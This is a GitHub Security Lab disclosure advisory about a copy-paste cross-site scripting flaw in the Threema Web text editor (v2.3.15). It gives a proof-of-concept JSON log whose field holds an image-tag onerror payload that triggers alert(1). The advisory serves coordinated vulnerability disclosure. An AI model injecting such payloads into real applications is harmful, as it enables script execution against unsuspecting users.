skip to content
Back to GitHub.com
Home Bounties Research Advisories Get Involved Events
September 23, 2021

GHSL-2021-1004: Copy-paste XSS in Threema Web text editor

Alvaro Munoz

Coordinated Disclosure Timeline

Summary

Copy-paste XSS in Threema Web text editor

Product

Threema Web

Tested Version

v2.3.15

Details

Issue: Copy-paste XSS in Threema-Web (GHSL-2021-1004)

The Threema Web text editor is vulnerable to copy-paste cross-site scripting (XSS). For this particular type of XSS, the victim needs to be fooled into copying a malicious payload into the text editor.

Proof of concept (tested on Chrome):

{
  "config": {},
  "browser": "XSS browser",
  "log": [
    [
      1631303341684,
      "debug",
      "%c[State-S]",
      "",
      {
      	"constructor": "<img src='foo' onerror='alert(1)'>"
      }
    ]
  ]
}

Note: This issue was found using the following CodeQL query

Impact

This issue may lead to XSS with user interaction

Credit

This issue was discovered by GHSL team member @erik-krogh (Erik Kristensen) using the CodeQL query contributed by @bananabr (Daniel Santos).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2021-1004 in any communication regarding this issue.